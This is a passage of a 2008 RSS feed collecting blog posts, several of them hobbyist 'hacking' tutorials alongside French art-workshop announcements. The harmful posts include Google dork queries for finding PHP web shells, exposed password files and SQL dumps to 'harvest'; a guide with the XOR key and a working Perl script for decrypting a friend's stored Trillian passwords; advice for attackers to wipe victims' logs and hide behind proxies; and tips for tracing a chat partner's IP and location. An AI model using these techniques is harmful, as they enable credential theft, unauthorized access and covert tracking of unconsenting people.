<content:encoded><![CDATA[<p><a href="http://knubbl.wordpress.com/files/2008/07/pic.jpg"><img style="border:1px solid silver;float:left;margin-right:20px;width:250px;height:150px;" src="http://knubbl.wordpress.com/files/2008/07/pic.jpg" alt="" /></a>Steve Rigano, a French programmer, sold 0day exploits to get money for a start-up project. These exploits included Windows, SAP and HP vulnerabilities. Ironicly enough Steve Rigano was working at that time for HP.</p>
<p>Here is the <a title="HP Security Consultant Selling HP Exploits" href="http://www.fastcompany.com/magazine/127/nexttech-fear-of-a-black-hat.html?page=0%2C2" target="_blank">full article</a>.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Hacking ---all tested and 100% worked---]]></title>
<link>http://busthood.wordpress.com/?p=6</link>
<pubDate>Sat, 05 Jul 2008 17:13:54 +0000</pubDate>
<dc:creator>busthood</dc:creator>
<guid>http://busthood.wordpress.com/?p=6</guid>
<description><![CDATA[shell PHP (intitle:&#8221;PHP Shell *&#8221; &#8220;Enable stderr&#8221; filetype:php)
nih buat liat]]></description>
<content:encoded><![CDATA[<p>shell PHP (intitle:"PHP Shell *" "Enable stderr" filetype:php)</p>
<p>nih buat liat file (sukur2 busa upload sekalian deface) ("Powered by PHPFM" filetype:php -username)</p>
<p>nih buat liat password (tapi beberapa di enkripsi) (wwwboard WebAdmin inurl:passwd.txt)</p>
<p>intip database admin (allinurl: admin mdb)</p>
<p>panen password SQL (filetype:sql ("passwd values" &#124; "password values" &#124; "pass values" ))</p>
<p>asik buat ngirim file ("File Upload Manager v1.3" "rename to")</p>
<p>nih masuk database PHP ("File Upload Manager v1.3" "rename to")</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Circuit Bending - Computer Truck]]></title>
<link>http://indisciplinaire.wordpress.com/?p=97</link>
<pubDate>Sat, 05 Jul 2008 17:11:06 +0000</pubDate>
<dc:creator>Raphael</dc:creator>
<guid>http://indisciplinaire.wordpress.com/?p=97</guid>
<description><![CDATA[Le circuit bending (« pliage de circuit » en français) désigne l&#8217;activité qui consiste à]]></description>
<content:encoded><![CDATA[<p style="text-align:justify;"><a href="http://indisciplinaire.files.wordpress.com/2008/07/10000000000002580000019068a92b89.jpg"></a><a href="http://indisciplinaire.files.wordpress.com/2008/07/10000000000002580000019068a92b89.jpg"><img class="alignleft size-medium wp-image-99" style="border:0;" src="http://indisciplinaire.wordpress.com/files/2008/07/10000000000002580000019068a92b89.jpg?w=300" alt="" width="210" height="140" /></a>Le circuit bending (« pliage de circuit » en français) désigne l'activité qui consiste à court- circuiter de façon volontaire des gadgets de faible voltage, fonctionnant sur piles (jouets pour enfants munis de haut-parleur, effets pour guitare, petit synthétiseurs) de façon à créer de nouveaux générateurs de sons. Cette activité mettant en avant la spontanéité et le côté aléatoire des modifications, le circuit bending est communément associé à la musique bruitiste, mais peut être utilisée de manière plus dansant comme par exemple dans le travail de Computer Truck. Le but de ces ateliers est de sensibiliser les publics à cette nouvelle pratique musicale, apparue dans les années 70. Pour y participer, aucune formation particulière en musique ou en électronique n'est requise, mais il faudra apporter ses jouets et autres bidules électroniques. Afin d'avoir un maximum de participants, les ateliers prendront place de préférence sur le site du Fort du Grognon dans l'après-midi.</p>
<p><a href="http://computertruck.parishq.net/"><span style="color:#7f1d1d;">http://computertruck.parishq.net/</span></a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Googling]]></title>
<link>http://busthood.wordpress.com/?p=3</link>
<pubDate>Sat, 05 Jul 2008 17:09:36 +0000</pubDate>
<dc:creator>busthood</dc:creator>
<guid>http://busthood.wordpress.com/?p=3</guid>
<description><![CDATA[the best search site 
Googling E-Book
ketik: +(”index of”) +(”/ebooks”|”/book”) +(chm|pd]]></description>
<content:encoded><![CDATA[<p><span style="font-weight:bold;color:#cc0066;">the best search site </span><br />
Googling E-Book<br />
ketik: +(”index of”) +(”/ebooks”&#124;”/book”) +(chm&#124;pdf&#124;zip&#124;rar) +apache<br />
Adalah Query yang menghasilkan Index ebook di server yang berbasis Apache<br />
ketik: allinurl: +(rar&#124;chm&#124;zip&#124;pdf&#124;tgz&#124;lit) judul buku<br />
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari “Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini digunakan jika benar-benar mengetahui judul buku yang dicari. Googling Warez.<br />
ketik: “parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums<br />
ketik: “parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums<br />
ketik: “parent directory ” applications -xxx -html -htm -php -shtml -opendivx -md5 -md5sums<br />
ketik: “parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums<br />
ketik: “parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums<br />
Ganti Kata yang tebal dengan query. Contoh, jika ingin mencari Limewire maka ganti “applications” dengan Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In Time, ganti “MP3? dengan Child in Time atau jika ingin mencari lagu-lagu Deep Purple tinggal ganti “MP3? dengan Deep Purple.</p>
<p>Googling MP3<br />
ketik: ?intitle:index.of? mp3<br />
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini. Setelah MP3 kasih apa yang pengen dicari. Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini<br />
ketik: ?intitle:index.of? mp3 led zeppelin</p>
<p>Googling file di megaupload<br />
Untuk mencari File Video<br />
ketik : avi&#124;mpg&#124;mpeg&#124;wmv&#124;rmvb site:megaupload.com<br />
Untuk mencari File musik<br />
ketik : mp3&#124;ogg&#124;wma site:megaupload.com<br />
Untuk mencari archive dan program<br />
ketik : zip&#124;rar&#124;exe site:megaupload.com<br />
Untuk mencari ebooks<br />
ketik : pdf&#124;rar&#124;zip&#124;doc&#124;lit site:megaupload.com</p>
<p>Googling file di rapidshare.de<br />
Untuk mencari File Video<br />
ketik : avi&#124;mpg&#124;mpeg&#124;wmv&#124;rmvb site:rapidshare.de<br />
Untuk mencari File musik<br />
ketik : mp3&#124;ogg&#124;wma site:rapidshare.de<br />
Untuk mencari archive dan program<br />
ketik : zip&#124;rar&#124;exe site:rapidshare.de<br />
Untuk mencari ebooks<br />
ketik : pdf&#124;doc&#124;lit&#124;rar&#124;zip site:rapidshare.de<br />
MOGA BERMANFAAT.....AMIN</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[How to find someones Trillian passwords]]></title>
<link>http://empa7hy.wordpress.com/?p=17</link>
<pubDate>Sat, 05 Jul 2008 16:44:50 +0000</pubDate>
<dc:creator>empa7hy</dc:creator>
<guid>http://empa7hy.wordpress.com/?p=17</guid>
<description><![CDATA[Let&#8217;s say your best buddy just installed Trillian, obviously, you want to know his passwords, ]]></description>
<content:encoded><![CDATA[<p>Let's say your best buddy just installed Trillian, obviously, you want to know his passwords, (natural curiosity and all that ;]).</p>
<p>Here are two ways to get that going.</p>
<p>The trillian passwords are stored separately in .ini files (which relate to each network, i.e. there is a msn.ini, and a aim.ini etc). These are stored in your trillian directory (usually c:\program files\trillian\) in the "users" folder.<br />
Within the users folder, the ini files will either be in a folder called "default" or a folder named after your username. For example, on my installation for testing purposes, the msn.ini was stored at:</p>
<p><span class="info"><br />
c:\program files\trillian\users\default\msn.ini<br />
</span></p>
<p>On opening this file...you find details like:</p>
<p><span class="info"><br />
[msn]<br />
auto reconnect=1<br />
save passwords=1<br />
idle time=15<br />
show buddy status=1<br />
port=1863<br />
server=messenger.hotmail.com<br />
last msn=someone@hotmail.com<br />
connect num=10<br />
connect sec=60<br />
save status=1<br />
ft port=6891<br />
[profile 0]<br />
name=someone@hotmail.com<br />
password=A347F2B74EE9A9F6 </span></p>
<p>The line <span class="info">"password=A347F2B74EE9A9F6"</span> is obviously the encrypted password that we want to decrypt. Now, the encryption used here is a simple xor encryption of the original password, which is then represented as hex. If we split the password into the actual hex representation, it might make more sense:</p>
<p><span class="info"><br />
A3 47 F2 B7 4E E9 A9 F6<br />
</span></p>
<p>First, we need to know what the hex value "A3" (the first value of the encrypted password) represents in standard numbers. If you know your hex, you will know that the value of "A3" is 163. I know for a fact that the first letter of my password is "P", therefore - to find out what trillian xor'd with my original "P" in order to get 163 - we do the following calculation:</p>
<p><span class="info"><br />
Numeric value of A3 = 163<br />
Numeric (ascii) value of P = 80</p>
<p>Calculation: 80 XOR 163 = 243<br />
</span></p>
<p>There we go - 243 is the number that the first value of your password is xor'd with. We can test this by doing the process in reverse using this knowledge:</p>
<p><span class="info"><br />
First letter of password = P<br />
Ascii value of P = 80<br />
XOR key for 1st char = 243<br />
Calculation = 80 xor 243 = 163<br />
163 in Hex = A3<br />
Encrypted password so far: A3<br />
Go on to 2nd character...and so on...<br />
</span></p>
<p>Hopefully, you can now see how trivial it is to get the rest of the xor key numbers and how to decrypt the passwords once you have the xor key. Let me save you some time...the xor key numbers for each char are (in order):</p>
<p><span class="info"><br />
243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185, 230, 083, 122, 149, 124, 000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000, 255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000, 128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116, 111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112, 114, 111, 120, 000<br />
</span></p>
<p>As most passwords are usually 5-10 letters/numbers long, you will rarely need to use even a quarter of those xor keys.</p>
<p>And just to help clarify...here is a perl script I have written which will decrypt an encrypted trillian password:</p>
<p><span class="info">#!/usr/bin/perl</p>
<p>#################<br />
# Uncomment if you are running as a cgi<br />
#print "Content-type: text/html\n\n";</p>
<p>$encrypted = "A347F2B74EE9A9F6";  # put your encrypted password here!</p>
<p>$xorkeys = "243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185, 230, 083, 122, 149, 124, 000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000, 255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000, 128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116, 111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112, 114, 111, 120, 000";</p>
<p>$pointer = 0;</p>
<p>@keys = split(/, /, $xorkeys);</p>
<p>print "Decrypted Password: ";</p>
<p>foreach $key (@keys)<br />
{<br />
$passchar = chr(hex(substr($encrypted, $pointer, 2)) ^ $key);<br />
print "$passchar";<br />
last if ($pointer == length($encrypted) - 2);<br />
$pointer += 2;<br />
}</p>
<p>exit;<br />
</span></p>
<p>http://www.wangproducts.co.uk/article.php?id=34</p>
<p>The other way to get access to a trillian password, is to use google. :P</p>
<p>http://www.google.com/search?q=freeware+trillian+password+viewer&#38;ie=utf-8&#38;oe=utf-8&#38;aq=t&#38;rls=org.mozilla:en-US:official&#38;client=firefox-a</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Quick Batch File Compiler.]]></title>
<link>http://gamingonee.wordpress.com/?p=91</link>
<pubDate>Sat, 05 Jul 2008 16:31:05 +0000</pubDate>
<dc:creator>w4l0rd!</dc:creator>
<guid>http://gamingonee.wordpress.com/?p=91</guid>
<description><![CDATA[
Actualizado!!
QBFC es la herramienta ideal para todas aquellas personas interesadas en programar en]]></description>
<content:encoded><![CDATA[<div class="content"><span class="imgcenter"><img src="http://files.myopera.com/jcferpa/blog/QBFC.png" alt="" /></span></p>
<p><span style="font-size:x-large;">Actualizado!!</span></p>
<p><span class="alignjustify">QBFC es la herramienta ideal para todas aquellas personas interesadas en programar en Batch. Para muchos este lenguaje es demasiado simple pero es esta su principal ventaja, porque no se necesita demasiado preparación o habilidad para hacer una enorme cantidad de cosas usando Batch. Lo que hace QBFC es convertir nuestros archivos. Bat en .exe y al mismo tiempo nos ofrece la estupenda opción de hacer que el ejecutable obtenido trabaje de forma oculta, además también podemos incluir dentro del .exe pequeños archivos necesarios para ciertas tareas, tales como claves de registro o algún otro documento.<br />
Es excelente para hacer programas portables si lo combinamos con Winrar, ya que podremos incluir muchas más opciones de arranque y configuración.</span></div>
<div class="content"></div>
<div class="content"><span class="alignjustify">Ademas, Con un poko de Imaginacion.. podrias hacer muchas kosas XD!</span></p>
<p><span style="font-size:x-large;">Descargar Akí:</span><br />
<a href="http://www.esnips.com/doc/197eb581-99ce-4b87-adac-a4a481f5eb45/Quick-Batch-Compiler" target="_blank">http://www.esnips.com/doc/197eb581-99ce-4b87-adac-a4a481f5eb45/Quick-Batch-Compiler</a></div>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Keep in multitouch - Jimmy Hertz &amp; Raphaël Isdant]]></title>
<link>http://indisciplinaire.wordpress.com/?p=90</link>
<pubDate>Sat, 05 Jul 2008 15:55:22 +0000</pubDate>
<dc:creator>Raphael</dc:creator>
<guid>http://indisciplinaire.wordpress.com/?p=90</guid>
<description><![CDATA[A l&#8217;heure ou les surfaces multitouch inondent un marché très ciblé professionnel, cet ]]></description>
<content:encoded><![CDATA[<p style="text-align:justify;"><a href="http://indisciplinaire.files.wordpress.com/2008/07/multitouch.jpg"><img class="alignleft size-medium wp-image-91" style="border:0;" src="http://indisciplinaire.wordpress.com/files/2008/07/multitouch.jpg?w=259" alt="" width="131" height="150" /></a>A l'heure ou les surfaces multitouch inondent un marché très ciblé professionnel, cet atelier proposera d'aborder les différentes solutions techniques existantes et de fabriquer sa propre interface tactile multipoint low-cost. A partir d'une boîte en carton, une feuille de papier, un ordinateur  et  d'une webcam, différents dispositifs d'interraction seront prototypés. Des applications sous logiciel libre (Pure Data), permettront d'expérimenter  des projets ludiques et créatifs, explorant les possibilitées d'interraction multi-utilisateurs.</p>
<p style="text-align:justify;"><a href="http://raphael.isdant.free.fr">http://raphael.isdant.free.fr</a></p>
<p style="text-align:justify;"><a href="http://sassexperience.org">http://sassexperience.org</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Telnet]]></title>
<link>http://empa7hy.wordpress.com/?p=15</link>
<pubDate>Sat, 05 Jul 2008 15:46:29 +0000</pubDate>
<dc:creator>empa7hy</dc:creator>
<guid>http://empa7hy.wordpress.com/?p=15</guid>
<description><![CDATA[TELNET (TELecommunication NETwork) is a network protocol used on the Internet or local area network ]]></description>
<content:encoded><![CDATA[<p><strong>TELNET</strong> (<strong>TEL</strong>ecommunication <strong>NET</strong>work) is a <span class="mw-redirect">network protocol</span> used on the Internet or <span class="mw-redirect">local area network (LAN)</span> connections. It was developed in 1969 beginning with <span class="external">RFC 15</span> and standardized as IETF STD 8, one of the first Internet standards.</p>
<p>Well, since some of you still have no idea what telnet is, let's try it out.</p>
<p>We're going to telnet to 192.220.216.129.</p>
<p>Open up the command prompt,</p>
<p>Start &#62; All Programs &#62; Accessories &#62; Command Prompt</p>
<p>OR</p>
<p>Windows + R (windows key is between Alt and Ctrl on the left hand side)</p>
<p>Type in cmd</p>
<p>Now we should have something like:</p>
<p><img class="alignnone" src="http://xdobs.com/cnc/img/dos-command-prompt.gif" alt="Cmd Prompt" /></p>
<p>Before telnetting, we always need to make sure the host is online. Do this by typing in:</p>
<p>ping 192.220.216.129</p>
<p>You should get something like this:</p>
<p>Pinging 192.220.216.129 with 32 bytes of data:</p>
<p>Reply from 192.220.216.129: bytes=32 time=123ms TTL=50<br />
Reply from 192.220.216.129: bytes=32 time=331ms TTL=50<br />
Reply from 192.220.216.129: bytes=32 time=121ms TTL=50<br />
Reply from 192.220.216.129: bytes=32 time=121ms TTL=50</p>
<p>Ping statistics for 192.220.216.129:<br />
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),<br />
Approximate round trip times in milli-seconds:<br />
Minimum = 121ms, Maximum = 331ms, Average = 174ms</p>
<p>If you had written something like ping www.google.com, you would have gotten their I.P address.</p>
<p>On some insecure schools, you can enter a blocked website by using the I.P address of it</p>
<p>Now that we have made sure 192.220.216.129 is online, let's telnet to it.</p>
<p>Type in</p>
<p>telnet 192.220.216.129 21</p>
<p>If you got nothing, that's good.</p>
<p>This means the port is dead, and not usable for us. (Or it's a clever honeypot)</p>
<p>Let's telnet to the next port.</p>
<p>telnet 192.220.216.129 22</p>
<p>Hopefully, you got something like</p>
<p>SSH-2.0-OpenSSH_3.9p1</p>
<p>Protocol mismatch.</p>
<p>This piece of text gives us some vital information, whoever the I.P address belongs to is running Open SSH 3.9</p>
<p>Theoretically, you could exploit that.</p>
<p>Anyway. That's my tutorial on telnet, hopefully you learned something.</p>
<p>Until later!</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux security and hacking]]></title>
<link>http://wonderingpondering.wordpress.com/?p=260</link>
<pubDate>Sat, 05 Jul 2008 12:28:49 +0000</pubDate>
<dc:creator>wonderingpondering</dc:creator>
<guid>http://wonderingpondering.wordpress.com/?p=260</guid>
<description><![CDATA[Linux security and hacking - the 10 best tools. Need I say more?
]]></description>
<content:encoded><![CDATA[<p>Linux security and hacking - <a title="10 best hacking and security tools for Linux" href="http://www.junauza.com/2008/07/10-best-hacking-and-security-software.html" target="_blank">the 10 best tools</a>. Need I say more?</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Super Mario Too Much Mushroom - Pierre Eric Lefebvre]]></title>
<link>http://indisciplinaire.wordpress.com/?p=13</link>
<pubDate>Sat, 05 Jul 2008 12:07:32 +0000</pubDate>
<dc:creator>Raphael</dc:creator>
<guid>http://indisciplinaire.wordpress.com/?p=13</guid>
<description><![CDATA[Dans cette installation interactive Pierre-Erick   Lefebvre  aka Jankenpopp maltraite   la  ]]></description>
<content:encoded><![CDATA[<p style="text-align:justify;"><a href="http://indisciplinaire.files.wordpress.com/2008/07/10000000000001f40000014d8404f9f7.png"></a><a href="http://indisciplinaire.files.wordpress.com/2008/07/2much.jpg"><img class="alignleft size-medium wp-image-53" style="border:0;" src="http://indisciplinaire.wordpress.com/files/2008/07/2much.jpg?w=300" alt="" width="270" height="179" /></a>Dans cette installation interactive Pierre-Erick   Lefebvre  aka <a href="http://jankenpopp.free.fr/" target="_blank">Jankenpopp</a> maltraite   la   cartouche NES avec son « Super Mario Too Much Mushroom » jusqu’à rendre l’aventure du plombier   italien   totalement méconnaissable.   Si   le   jeu   reste parfaitement   jouable,   l’univers   visuel   et sonore devient totalement psychédélique.</p>
<p style="text-align:justify;"><span style="text-decoration:underline;"><span style="color:#800080;"><a href="http://jankenpopp.free.fr/blog/index.php?2006/12/21/32-gamerz">http://jankenpopp.free.fr/blog/index.php?2006/12/21/32-gamerz</a></span></span><a href="http://jankenpopp.free.fr/"></a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Computer Truck]]></title>
<link>http://indisciplinaire.wordpress.com/?p=9</link>
<pubDate>Sat, 05 Jul 2008 12:07:00 +0000</pubDate>
<dc:creator>Raphael</dc:creator>
<guid>http://indisciplinaire.wordpress.com/?p=9</guid>
<description><![CDATA[Véritable prodige du circuit bending, issu de la scène punk et techno underground, le français Ju]]></description>
<content:encoded><![CDATA[<p style="text-align:justify;"><a href="http://indisciplinaire.files.wordpress.com/2008/07/1000000000000141000001416b7432d0.jpg"><img class="alignleft size-medium wp-image-49" style="border:0;" src="http://indisciplinaire.wordpress.com/files/2008/07/1000000000000141000001416b7432d0.jpg?w=300" alt="" width="180" height="180" /></a>Véritable prodige du circuit bending, issu de la scène punk et techno underground, le français Julien   Daigremont  aka  Computer   Truck produit une musique électronique rétro futuriste particulièrement   ludique   et   inventive.  Pour  ce  faire,   il  n'hésite pas à détourner   les jouets   de   notre   enfance   :   dictées   et   livres magiques, petits orgues électroniques, pédales d‘effets   variées,   quant   il   ne   fabrique   pas   lui même ses propres synthétiseurs. Ce musicien-bidouilleur   leur   fait   subir   une   chirurgie électronique   et   esthétique.   Dans   ces compositions il associe ces objets musicaux à des rythmiques aux influences multiples, passant du breakbeat au hip hop,  le tout  teinté de réminiscences funk et noisy.</p>
<p> <a href="http://computertruck.parishq.net/">http://computertruck.parishq.net/</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Automated Google Hacking]]></title>
<link>http://knubbl.wordpress.com/?p=42</link>
<pubDate>Sat, 05 Jul 2008 10:56:20 +0000</pubDate>
<dc:creator>knubbl</dc:creator>
<guid>http://knubbl.wordpress.com/?p=42</guid>
<description><![CDATA[Using Google To Your Advantage
Google is one of the biggest companies now a days. It provides you wi]]></description>
<content:encoded><![CDATA[<p><strong>Using Google To Your Advantage</strong></p>
<p>Google is one of the biggest companies now a days. It provides you with so many services that no one could imagine the internet without it. Google's search engine is what I am going to focus on in this article since that is what <a title="Google Hacking" href="http://knubbl.wordpress.com/2008/06/03/google-hacking/" target="_self">Google Hacking</a> is about. The term actually refers to using Google's search engine in an advanced way to find sensitive information. If you haven't done any <a title="Google Hacking" href="http://knubbl.wordpress.com/2008/06/03/google-hacking/" target="_self">Google Hacking</a> yet then take a look at this <a title="hacking article" href="http://knubbl.wordpress.com/2008/06/03/google-hacking/" target="_blank">hacking article</a>.<a href="http://knubbl.wordpress.com/files/2008/07/goolagscanner.png"><img style="border:1px solid silver;float:left;margin-right:20px;width:250px;height:150px;" src="http://knubbl.wordpress.com/files/2008/07/goolagscanner.png" alt="" /></a></p>
<p><strong>Automated Google Hacking</strong></p>
<p>Since Google Hacking can be quite time consuming people from the Cult of the Dead Cow wrote a <a title="Goolag Program" href="http://www.goolag.org/download.html" target="_blank">program </a>which automates this task. It is a pretty cool tool but the bad part is that you can not send queries that often. So do NOT use the program too often or send to many queries since that may cause Google to ban you!</p>
<p>It is still worth taking a look at especially for administrators to scan whether their websites give away too much information. I've used Google Hacking myself several times and found some really really sensitive information so Google Hacking is not something you should underestimate.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Menyembunyikan IP Address]]></title>
<link>http://gustysoft.wordpress.com/?p=18</link>
<pubDate>Sat, 05 Jul 2008 08:41:00 +0000</pubDate>
<dc:creator>Tony Agustian</dc:creator>
<guid>http://gustysoft.wordpress.com/?p=18</guid>
<description><![CDATA[Beberapa alasan mengapa kita harus menyembunyikan IP Address asli antara  lain:  * Mengakses ke webs]]></description>
<content:encoded><![CDATA[<p><span style="font-family:courier new;">Beberapa alasan mengapa kita harus menyembunyikan IP Address asli antara </span> <span style="font-family:courier new;">lain: </span> <span style="font-family:courier new;">* Mengakses ke website yang melakukan restriction -- hanya membolehkan </span> <span style="font-family:courier new;">akses dari IP Address tertentu saja. </span> <span style="font-family:courier new;">* Privasi. </span> <span style="font-family:courier new;">* Menghindari pelacakan jika kita melakukan tindakan yang 'tidak </span> <span style="font-family:courier new;">seharusnya kita lakukan'. (baca: hacking) </span> <span style="font-family:courier new;">------&#124; Menggunakan Proxy </span> <span style="font-family:courier new;">Dalam melangsungkan sebuah proses attack, sebaiknya seorang attacker melakukan </span> <span style="font-family:courier new;">beberapa pengamanan. Umumnya yang dilakukan adalah: </span> <span style="font-family:courier new;">* Menghapus log files pada victim </span> <span style="font-family:courier new;">* Menyembunyikan IP Address komputer yang digunakan untuk melangsungkan </span> <span style="font-family:courier new;">attack </span> <span style="font-family:courier new;">* Melakukan modifikasi minimum untuk tidak menarik perhatian pemilik </span> <span style="font-family:courier new;">system seperti tidak menambah user atau membuat direktori yang terlalu </span> <span style="font-family:courier new;">'vulgar' </span> <span style="font-family:courier new;">Penggunaa proxy disesuaikan dengan program yang kita gunakan untuk melakukan </span> <span style="font-family:courier new;">browsing seperti Internet Explorer, Mozilla, Opera, mIRC, dan lain-lain. </span> <span style="font-family:courier new;">---&#124; Sample: Internet Explorer </span> <span style="font-family:courier new;">1. Jalankan Internet Explorer (IE) </span> <span style="font-family:courier new;">2. Klik Tools </span> <span style="font-family:courier new;">3. Klik Internet Option </span> <span style="font-family:courier new;">4. Klik Connections </span> <span style="font-family:courier new;">5. Klik LAN Settings </span> <span style="font-family:courier new;">6. Aktifkan option 'Use a proxy server' </span> <span style="font-family:courier new;">+-------------------+ +--------+ </span> <span style="font-family:courier new;">Address : IP Address : Port : Port : </span> <span style="font-family:courier new;">+-------------------+ +--------+ </span> <span style="font-family:courier new;">---&#124; Sample: wget </span> <span style="font-family:courier new;">1. Edit file /etc/wgetrc atau ~/.wgetrc </span> <span style="font-family:courier new;">2. Ubah atau tambahkan baris </span> <span style="font-family:courier new;">http_proxy=http://ip_address_proxy:port/ </span> <span style="font-family:courier new;">---&#124; Sample: libwww-perl (LWP) </span> <span style="font-family:courier new;">Pada source code program yang menggunakan bahasa pemrograman Perl dapat </span> <span style="font-family:courier new;">ditambahkan: </span> <span style="font-family:courier new;">$ua-&#62;proxy(['http', 'ftp'], 'http://ip_address_proxy:port/'); </span> <span style="font-family:courier new;">Cara lain adalah dengan meload proxy setting dari *_proxy environment </span> <span style="font-family:courier new;">variables. </span> <span style="font-family:courier new;">$ua-&#62;env_proxy </span> <span style="font-family:courier new;">Untuk mengubah environment variables, dapat dilakukan via command line: </span> <span style="font-family:courier new;">$ export http_proxy=http://ip_address_proxy:port/ (sh/bash/ksh) </span> <span style="font-family:courier new;">% setenv http_proxy 'http://127.0.0.1:8080/' (csh/tcsh) </span> <span style="font-family:courier new;">------&#124; Proxy testing </span> <span style="font-family:courier new;">Jika semuanya berjalan lancar maka kita dapat melakukan browsing secara </span> <span style="font-family:courier new;">anonymous. Lihat bagian appendix untuk mendapatkan contoh anonymous proxy. </span> <span style="font-family:courier new;">Untuk mengetahui apakah IP Address asli yang kita gunakan sudah tersembunyi </span> <span style="font-family:courier new;">dan digantikan oleh IP Address milik anonymous web proxy, kita dapat </span> <span style="font-family:courier new;">melakukan pengecekan dengan melakukan browsing ke website yang memiliki </span> <span style="font-family:courier new;">fitur browser checker seperti </span> <span style="font-family:courier new;">* http://www.dedidwianto.or.id </span> <span style="font-family:courier new;">* noc.cbn.net.id </span> <span style="font-family:courier new;">* dan lain-lain </span> <span style="font-family:courier new;">------&#124; Anonymity </span> <span style="font-family:courier new;">Beberapa istilah yang berkaitan dengan anonymous proxy: </span> <span style="font-family:courier new;">* Anonymous - HTTP proxy server tidak mengirimkan variable </span> <span style="font-family:courier new;">HTTP_X_FORWARDED_FOR kepada remote host, hal diini dilakukan untuk </span> <span style="font-family:courier new;">menyembunyikan IP Address asli kita. </span> <span style="font-family:courier new;">* High anonymity (elite proxy) - HTTP proxy server jenis ini tidak </span> <span style="font-family:courier new;">mengirimkan variable HTTP_X_FORWARDED_FOR, HTTP_VIA dan </span> <span style="font-family:courier new;">HTTP_PROXY_CONNECTION. </span> <span style="font-family:courier new;">Apa yang membedakan anonymous proxy dan elite proxy adalah pengiriman </span> <span style="font-family:courier new;">variable HTTP_* oleh proxy server. Pada anonymous proxy, sangat dimungkinkan </span> <span style="font-family:courier new;">bagi remote host untuk mengetahui IP Address asli yang kita miliki dengan </span> <span style="font-family:courier new;">melihat variable HTTP_VIA dan HTTP_PROXY_CONNECTION.</span></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Melacak IP Address &amp; Real Addess Seseorang]]></title>
<link>http://gustysoft.wordpress.com/?p=17</link>
<pubDate>Sat, 05 Jul 2008 08:31:53 +0000</pubDate>
<dc:creator>Tony Agustian</dc:creator>
<guid>http://gustysoft.wordpress.com/?p=17</guid>
<description><![CDATA[Pengen tau cara melihat IP address seseorang yang posisinya jauh dari kita. Mm&#8230; singkatnya sih]]></description>
<content:encoded><![CDATA[<p>Pengen tau cara melihat IP address seseorang yang posisinya jauh dari kita. Mm... singkatnya sih tinggal telepon atau sms aja kali yah... :)</p>
<p>Ada banyak cara sih, tapi kalo hanya sekedar ingin tau bagamana cara melacak IP Address, cukup baca beberapa point di bawah ini :</p>
<ol>
<li>Ping www.target.com
<p>Cara pertama, Untuk mengetahui alamat IP Address sebuah situs caranya mudah sekali, tinggal Ping menggunakan Command Prompt. Contoh --&#62; ping www.yahoo.com</li>
<li>Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.</li>
<li>Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.</li>
</ol>
<p>*Ingin menggunakan YM untuk beberapa user id di komputer yang sama? Anda bisa menggunakan software dan juga bisa dengan trik di bawah ini:</p>
<p>1. Start &#62; Run…&#62; regedit</p>
<p>2. Buka HKEY_CURRENT_USER &#62; Software &#62; yahoo &#62; pager &#62; test</p>
<p>3. Pada sebelah kanan, klik kanan &#62; New &#62; DWORD value</p>
<p>4. Beri nama Plural tekan enter 2 kali dan berikan nilai 1</p>
<p>5. Pastikan YM anda telah dimatikan, jalankan YM dan login secara biasa.</p>
<p>6. Kalau masih tidak bisa coba lagi step ke-5, kalau masih tidak bisa RESTART Tutorial Hacker Part 2 :</p>
